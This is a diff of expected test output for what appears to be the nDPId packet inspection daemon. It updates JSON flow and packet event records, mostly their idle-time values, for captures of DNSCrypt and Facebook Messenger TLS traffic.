+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1491813286470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286470,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADUGuOWGdxoYwKgrpwG7xFOF+CiKXqXACIASchDdaAAAAgQFHgEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1491813286470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286470,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSxAAIAGMMXAqCunhncaGMRTAbtepcAIhfgoi1AQAECPdQAA"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1491813286489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286489,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xFKVdKj9XuwOhIASchD+twAAAgQFHgEBBAIBAwMH"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1491813286489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286489,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPS5AAIAGMMPAqCunhncaGMRSAbte7A6ElXSo\/lAQAECwxAAA"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","packets-captured":111,"packets-processed":111,"total-skipped-flows":0,"total-l4-data-len":38586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1491813286913} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 111/111 diff --git a/test/results/sites.pcapng.out b/test/results/sites.pcapng.out index 91b842a11..42be06ba9 100644 --- a/test/results/sites.pcapng.out +++ b/test/results/sites.pcapng.out @@ -1,340 +1,340 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"sites.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1595957694169} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595957694169,"flow_last_seen":1595957694169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595957694169,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595957694169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694169,"pkt":"CL6sCxdumt9Y+uvcCABFAAA86wlAAEAGQqHAqAypRav6FLRQAbvxSUO4AAAAAKAC\/\/943AAAAgQFtAQCCAp3CF\/6AAAAAAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595957694175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694175,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAAFUGGKtFq\/oUwKgMqQG7tFDMBUIi8UlDuaASbHAk8gAAAgQFeAQCCAqwcikLdwhf+gEDAwg="} -00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595957694181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":447,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":447,"pkt_l4_len":413,"thread_ts_msec":1595957694181,"pkt":"CL6sCxdumt9Y+uvcCABFAAGx6wtAAEAGQSrAqAypRav6FLRQAbvxSUO5zAVCI4AYAKzC2gAAAQEICncIYAWwcikLFgMBAXgBAAF0AwMbz\/EVbbBeXTFd91pcxBNP5UcnCfq3Wnx+FKK431A8vCCYle6z8aZolVAW\/WsVOAFFqAocCpVZly96\/6VmRt6unAAGEwETAhMDAQABJQArAAUEAwT7GgAKAAYABAAdABcAMwAmACQAHQAgzM0Khe3cuLbHFAoUoUQ75VluiC+bl0wBHYa7GiFLSWoADQAGAAQEAwgEAAAAGwAZAAAWZWRnZS1tcXR0LmZhY2Vib29rLmNvbQAQAAsACQJoMgVoMi1mYgAtAAMCAQAAKgAAACkAoQB8AHb7PHlIDGTq5r6EmcaA47DeHw9k60TmJpJ4kMbWc07CmAAAAACvwY+4+cqVZO3LiyMH\/OBKqYTgxknPoune8SSx08gYUQ5v8dX54IHzjPiACk0t5hhgO+DjiFkUqTNKryO5SnHrNvAKz6QqOMdma4t912EvXAHgfFvQwwAhIFgFM36LO5BemV+W466ubu2dweNDP\/fyvoT9kq0FWNy9"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595957694169,"flow_last_seen":1595957694169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595957694169,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595957694169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694169,"pkt":"CL6sCxdumt9Y+uvcCABFAAA86wlAAEAGQqHAqAypRav6FLRQAbvxSUO4AAAAAKAC\/\/943AAAAgQFtAQCCAp3CF\/6AAAAAAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595957694175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1595957694175,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAAFUGGKtFq\/oUwKgMqQG7tFDMBUIi8UlDuaASbHAk8gAAAgQFeAQCCAqwcikLdwhf+gEDAwg="} +00980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595957694181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":447,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":447,"pkt_l4_len":413,"thread_ts_msec":1595957694181,"pkt":"CL6sCxdumt9Y+uvcCABFAAGx6wtAAEAGQSrAqAypRav6FLRQAbvxSUO5zAVCI4AYAKzC2gAAAQEICncIYAWwcikLFgMBAXgBAAF0AwMbz\/EVbbBeXTFd91pcxBNP5UcnCfq3Wnx+FKK431A8vCCYle6z8aZolVAW\/WsVOAFFqAocCpVZly96\/6VmRt6unAAGEwETAhMDAQABJQArAAUEAwT7GgAKAAYABAAdABcAMwAmACQAHQAgzM0Khe3cuLbHFAoUoUQ75VluiC+bl0wBHYa7GiFLSWoADQAGAAQEAwgEAAAAGwAZAAAWZWRnZS1tcXR0LmZhY2Vib29rLmNvbQAQAAsACQJoMgVoMi1mYgAtAAMCAQAAKgAAACkAoQB8AHb7PHlIDGTq5r6EmcaA47DeHw9k60TmJpJ4kMbWc07CmAAAAACvwY+4+cqVZO3LiyMH\/OBKqYTgxknPoune8SSx08gYUQ5v8dX54IHzjPiACk0t5hhgO+DjiFkUqTNKryO5SnHrNvAKz6QqOMdma4t912EvXAHgfFvQwwAhIFgFM36LO5BemV+W466ubu2dweNDP\/fyvoT9kq0FWNy9"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1595957694169,"flow_last_seen":1595957694181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1595957694181,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1595957694188,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"edge-mqtt.facebook.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,h2-fb","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1623221441867} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623221441867,"flow_last_seen":1623221441867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623221441867,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623221441867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441867,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8opRAAEAGGajAqAH6XHpfY6OWAbs7TQBaAAAAAKAC\/\/9coQAAAgQFtAQCCAqqdeFuAAAAAAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623221441879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623221441879,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA8AABAADgGxDxcel9jwKgB+gG7o5aALohKO00AW6AS\/ojeuQAAAgQFtAQCCAoeqlgsqnXhbgEDAwc="} 